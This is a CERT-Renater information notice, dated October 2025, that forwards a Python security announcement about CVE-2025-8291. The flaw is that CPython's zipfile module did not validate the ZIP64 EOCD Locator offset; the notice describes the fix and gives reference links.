Ce mail provient de l'extérieur, restons vigilants

=====================================================================

                            CERT-Renater

                Note d'Information No. 2025/VULN677
_____________________________________________________________________

DATE                : 08/10/2025

HARDWARE PLATFORM(S): /

OPERATING SYSTEM(S): Systems running CPython.

=====================================================================
https://mail.python.org/archives/list/security-announce@python.org/thread/QECOPWMTH4VPPJAXAH2BGTA4XADOP62G/
_____________________________________________________________________


[CVE-2025-8291] ZIP64 End of Central Directory (EOCD) Locator record
offset not checked

Seth Larson
7 octobre 2025 11:06

There is a MEDIUM severity vulnerability affecting CPython.

The 'zipfile' module would not check the validity of the ZIP64 End
of Central Directory (EOCD) Locator record offset value would not be
used to locate the ZIP64 EOCD record, instead the ZIP64 EOCD record
would be assumed to be the previous record in the ZIP archive. This
could be abused to create ZIP archives that are handled differently
by the 'zipfile' module compared to other ZIP implementations.

Remediation maintains this behavior, but checks that the offset
specified in the ZIP64 EOCD Locator record matches the expected
value.

Please see the linked CVE ID for the latest information on
affected versions:

    https://www.cve.org/CVERecord?id=CVE-2025-8291
    https://github.com/python/cpython/pull/139702


=========================================================
+ CERT-RENATER        |    tel : 01-53-94-20-44         +
+ 23/25 Rue Daviel    |    fax : 01-53-94-20-41         +
+ 75013 Paris         |   email:cert@support.renater.fr +
=========================================================